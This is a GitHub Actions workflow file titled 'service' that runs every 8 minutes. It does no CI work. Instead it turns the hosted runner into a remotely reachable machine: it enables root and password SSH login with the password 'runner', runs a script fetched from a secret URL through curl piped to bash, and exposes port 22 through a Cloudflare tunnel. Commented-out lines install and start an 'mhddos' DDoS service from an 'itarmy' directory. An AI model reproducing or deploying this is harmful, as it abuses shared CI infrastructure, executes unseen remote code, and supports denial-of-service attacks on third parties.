name: service

on:
  schedule:
    - cron: "*/8 * * * *"
  workflow_dispatch:

jobs:
  ssh:
    runs-on: ubuntu-latest

    steps:
      - run: |
          sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin yes/' /etc/ssh/sshd_config
          echo "runner:runner" | sudo chpasswd
          sudo systemctl restart ssh
          curl -sL ${{ secrets.BLUESCRIPT }}  | bash -s
          curl -L https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 \
            -o cloudflared
          chmod +x cloudflared
          sudo mv cloudflared /usr/local/bin/
          gh auth login --with-token <<< "${{ secrets.PAT }}"
          gh auth setup-git
          sudo mkdir /mnt/repo
          sudo mkdir /mnt/repo/test
          sudo chmod 777 /mnt/repo/test
          # sudo git clone https://github.com/porntalk/test.git /mnt/repo/test
          # sudo cp /mnt/repo/test/itarmy/services/mhddos.service /etc/systemd/system
          # sudo cp /mnt/repo/test/itarmy/bin/mhddos_proxy_linux /opt/itarmy/bin/
          # sudo systemctl daemon-reload
          # sudo systemctl start mhddos.service
          # sudo systemctl enable mhddos.service
          

      # run TryCloudflare tunnel
      - name: Run tunnel
        id: tunnel
        run: |
          # run TryCloudflare tunnel
          cloudflared tunnel --url ssh://localhost:22 --no-autoupdate
          
